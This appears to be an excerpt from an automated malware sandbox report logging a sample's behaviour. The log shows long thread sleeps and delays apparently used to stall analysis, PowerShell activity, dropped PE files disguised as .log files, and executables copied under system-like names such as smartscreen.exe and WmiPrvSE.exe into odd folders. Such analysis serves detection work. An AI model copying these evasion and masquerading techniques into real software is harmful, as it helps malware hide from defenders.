                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564125
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564016
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563906
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563797
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563683
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563566
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563453
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563341
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563125
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 562002
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561887
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561780
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561672
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561562
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561438
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561328
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561157
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561047
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560934
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560817
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560703
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560585
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 559885
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 559757
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWindow / User API: threadDelayed 653Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1649Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1712Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1558Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1462
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1551
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2008
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1957
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1912
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1703
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1660
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1970
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1979
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWindow / User API: threadDelayed 858
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWindow / User API: threadDelayed 4484
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWindow / User API: threadDelayed 3467
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2103
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2196
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2087
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2269
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1867
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1949
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2441
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1950
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2042
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2068
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2012
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2423
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\fTGLCVSM.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\stDzyxQe.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\yuQrGMvY.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\uDZAyPvf.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\PwjnMVKl.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\gUHludjC.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\fcdLmHlJ.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\rreJQTki.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\ttRrlCpd.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\ylgZbdUT.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\EhviVOkL.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\aceLSxeO.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\KIRpkYvx.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\FNQYcsFE.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\WyUWCOVc.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\QyIevzpi.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\hILtgrfA.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\VoMNpBPa.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\DhiqiJKM.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\wjuqGuQY.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\VWRNVcdg.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\RGFoMnqm.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\bmmUfKkQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\nGlBWAAq.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\IUzpLFaA.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\ArFrORkS.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeDropped PE file which has not been started: C:\Users\user\Desktop\sBnSdgqk.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\qDaBeGpk.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 6176Thread sleep time: -193000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -599719s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -599516s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -599297s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -599078s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -598469s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -598125s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -597942s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -100000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -99812s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -99636s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -99438s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -99250s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -99070s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -98929s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -98782s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -98657s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -98530s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -595688s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -595529s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -595328s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680Thread sleep time: -595125s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8572Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep count: 1649 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8376Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 1712 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 1558 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 1462 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8380Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep count: 1551 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 2008 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 1957 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 1912 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 1703 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 1660 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 1970 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8396Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep count: 1979 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8388Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8076Thread sleep time: -858000s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8416Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -33204139332677172s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -599562s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -598984s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -598672s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -597906s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -597078s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -596641s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -596067s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -595375s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -595062s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9928Thread sleep time: -3600000s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -594234s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -593780s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -593234s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -592891s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -592516s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -591859s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -591500s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -591156s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -590859s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -590172s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -589953s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -589750s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -589516s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -589153s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -588922s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -588748s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -588453s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -588257s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -588019s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -587594s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -587391s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -587190s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -586922s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -586562s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -586348s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -585984s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -585743s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -585031s >= -30000s
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952Thread sleep time: -584708s >= -30000s
